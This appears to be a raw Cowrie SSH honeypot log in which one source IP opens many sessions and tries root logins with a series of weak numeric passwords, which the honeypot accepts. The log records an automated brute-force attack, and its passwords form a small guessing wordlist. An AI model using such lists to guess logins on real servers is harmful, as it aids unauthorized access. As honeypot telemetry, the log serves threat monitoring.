{"eventid":"cowrie.client.kex","hassh":"16443846184eafde36765c9bab2f4397","hasshAlgorithms":"mlkem768x25519-sha256,curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["mlkem768x25519-sha256","curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 16443846184eafde36765c9bab2f4397","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.775739Z","src_ip":"212.227.235.229","session":"cad1ddcc5153"}
{"eventid":"cowrie.client.kex","hassh":"16443846184eafde36765c9bab2f4397","hasshAlgorithms":"mlkem768x25519-sha256,curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["mlkem768x25519-sha256","curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 16443846184eafde36765c9bab2f4397","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.778022Z","src_ip":"212.227.235.229","session":"a7fb1045ea4e"}
{"eventid":"cowrie.client.kex","hassh":"16443846184eafde36765c9bab2f4397","hasshAlgorithms":"mlkem768x25519-sha256,curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["mlkem768x25519-sha256","curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 16443846184eafde36765c9bab2f4397","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.779609Z","src_ip":"212.227.235.229","session":"14fb9817bbbb"}
{"eventid":"cowrie.client.kex","hassh":"16443846184eafde36765c9bab2f4397","hasshAlgorithms":"mlkem768x25519-sha256,curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["mlkem768x25519-sha256","curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 16443846184eafde36765c9bab2f4397","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.781246Z","src_ip":"212.227.235.229","session":"cac46166befb"}
{"eventid":"cowrie.client.kex","hassh":"16443846184eafde36765c9bab2f4397","hasshAlgorithms":"mlkem768x25519-sha256,curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["mlkem768x25519-sha256","curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 16443846184eafde36765c9bab2f4397","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.782794Z","src_ip":"212.227.235.229","session":"3f8ce3773c93"}
{"eventid":"cowrie.client.kex","hassh":"16443846184eafde36765c9bab2f4397","hasshAlgorithms":"mlkem768x25519-sha256,curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["mlkem768x25519-sha256","curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 16443846184eafde36765c9bab2f4397","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.784624Z","src_ip":"212.227.235.229","session":"55425aaf0800"}
{"eventid":"cowrie.client.kex","hassh":"16443846184eafde36765c9bab2f4397","hasshAlgorithms":"mlkem768x25519-sha256,curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["mlkem768x25519-sha256","curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 16443846184eafde36765c9bab2f4397","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.786390Z","src_ip":"212.227.235.229","session":"121b33cc47b8"}
{"eventid":"cowrie.client.kex","hassh":"16443846184eafde36765c9bab2f4397","hasshAlgorithms":"mlkem768x25519-sha256,curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["mlkem768x25519-sha256","curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 16443846184eafde36765c9bab2f4397","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.788211Z","src_ip":"212.227.235.229","session":"4eb130214edc"}
{"eventid":"cowrie.client.kex","hassh":"16443846184eafde36765c9bab2f4397","hasshAlgorithms":"mlkem768x25519-sha256,curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["mlkem768x25519-sha256","curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 16443846184eafde36765c9bab2f4397","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.790154Z","src_ip":"212.227.235.229","session":"ac3b76fe0c62"}
{"eventid":"cowrie.client.kex","hassh":"16443846184eafde36765c9bab2f4397","hasshAlgorithms":"mlkem768x25519-sha256,curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["mlkem768x25519-sha256","curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 16443846184eafde36765c9bab2f4397","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.792237Z","src_ip":"212.227.235.229","session":"ca683d3fbce3"}
{"eventid":"cowrie.client.kex","hassh":"16443846184eafde36765c9bab2f4397","hasshAlgorithms":"mlkem768x25519-sha256,curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["mlkem768x25519-sha256","curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 16443846184eafde36765c9bab2f4397","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.794386Z","src_ip":"212.227.235.229","session":"bfd93fdc57bc"}
{"eventid":"cowrie.client.kex","hassh":"16443846184eafde36765c9bab2f4397","hasshAlgorithms":"mlkem768x25519-sha256,curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["mlkem768x25519-sha256","curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 16443846184eafde36765c9bab2f4397","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.796814Z","src_ip":"212.227.235.229","session":"e110aea31c80"}
{"eventid":"cowrie.login.success","username":"root","password":"11112222","message":"login attempt [root/11112222] succeeded","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.807905Z","src_ip":"212.227.235.229","session":"304c9ced0209"}
{"eventid":"cowrie.login.success","username":"root","password":"00004444","message":"login attempt [root/00004444] succeeded","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.809830Z","src_ip":"212.227.235.229","session":"61449104323e"}
{"eventid":"cowrie.login.success","username":"root","password":"10101010","message":"login attempt [root/10101010] succeeded","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.813695Z","src_ip":"212.227.235.229","session":"bfb3ef0b06fd"}
{"eventid":"cowrie.login.success","username":"root","password":"11111111","message":"login attempt [root/11111111] succeeded","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.815663Z","src_ip":"212.227.235.229","session":"804cba12643e"}
{"eventid":"cowrie.login.success","username":"root","password":"30303030","message":"login attempt [root/30303030] succeeded","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.819151Z","src_ip":"212.227.235.229","session":"6b767de709c9"}
{"eventid":"cowrie.login.success","username":"root","password":"@12345678","message":"login attempt [root/@12345678] succeeded","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.820701Z","src_ip":"212.227.235.229","session":"c078af94a6a3"}
{"eventid":"cowrie.login.success","username":"root","password":"11114444","message":"login attempt [root/11114444] succeeded","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.822203Z","src_ip":"212.227.235.229","session":"2cadf41aeac0"}
{"eventid":"cowrie.login.success","username":"root","password":"00003333","message":"login attempt [root/00003333] succeeded","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.823682Z","src_ip":"212.227.235.229","session":"268b12906f8c"}
{"eventid":"cowrie.login.success","username":"root","password":"12340000","message":"login attempt [root/12340000] succeeded","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.825041Z","src_ip":"212.227.235.229","session":"054331afa073"}
{"eventid":"cowrie.login.success","username":"root","password":"00001111","message":"login attempt [root/00001111] succeeded","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.826559Z","src_ip":"212.227.235.229","session":"be641c7f0eea"}
{"eventid":"cowrie.login.success","username":"root","password":"50505050","message":"login attempt [root/50505050] succeeded","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.827797Z","src_ip":"212.227.235.229","session":"4ebe652a4aef"}
{"eventid":"cowrie.login.success","username":"root","password":"00002222","message":"login attempt [root/00002222] succeeded","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.829204Z","src_ip":"212.227.235.229","session":"cac88380c723"}
{"eventid":"cowrie.login.success","username":"root","password":"10203040","message":"login attempt [root/10203040] succeeded","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.830441Z","src_ip":"212.227.235.229","session":"0c7cb507cfa4"}
{"eventid":"cowrie.login.success","username":"root","password":"00009999","message":"login attempt [root/00009999] succeeded","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.832006Z","src_ip":"212.227.235.229","session":"50459e2ed94b"}
{"eventid":"cowrie.login.success","username":"root","password":"00007777","message":"login attempt [root/00007777] succeeded","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.834167Z","src_ip":"212.227.235.229","session":"010f3872944a"}
{"eventid":"cowrie.login.success","username":"root","password":"00005555","message":"login attempt [root/00005555] succeeded","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.835812Z","src_ip":"212.227.235.229","session":"64a4edae596d"}
{"eventid":"cowrie.login.success","username":"root","password":"70707070","message":"login attempt [root/70707070] succeeded","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.837859Z","src_ip":"212.227.235.229","session":"971dee2568ef"}
{"eventid":"cowrie.login.success","username":"root","password":"20202020","message":"login attempt [root/20202020] succeeded","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.839136Z","src_ip":"212.227.235.229","session":"da4fb51bdd71"}
{"eventid":"cowrie.login.success","username":"root","password":"11223344","message":"login attempt [root/11223344] succeeded","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.840620Z","src_ip":"212.227.235.229","session":"4c0cece41bf3"}
{"eventid":"cowrie.login.success","username":"root","password":"40404040","message":"login attempt [root/40404040] succeeded","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.841880Z","src_ip":"212.227.235.229","session":"d99067db7f09"}
{"eventid":"cowrie.login.success","username":"root","password":"90909090","message":"login attempt [root/90909090] succeeded","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.843377Z","src_ip":"212.227.235.229","session":"406ad0cd93dd"}
{"eventid":"cowrie.login.success","username":"root","password":"55555555","message":"login attempt [root/55555555] succeeded","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.844504Z","src_ip":"212.227.235.229","session":"a7c0b3b3fe87"}
{"eventid":"cowrie.login.success","username":"root","password":"80808080","message":"login attempt [root/80808080] succeeded","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.845971Z","src_ip":"212.227.235.229","session":"d3fc4204b67a"}
{"eventid":"cowrie.login.success","username":"root","password":"00006666","message":"login attempt [root/00006666] succeeded","sensor":"my-vps","timestamp":"2025-08-28T22:14:06.847322Z","src_ip":"212.227.235.229","session":"8c7ea15fbb02"}
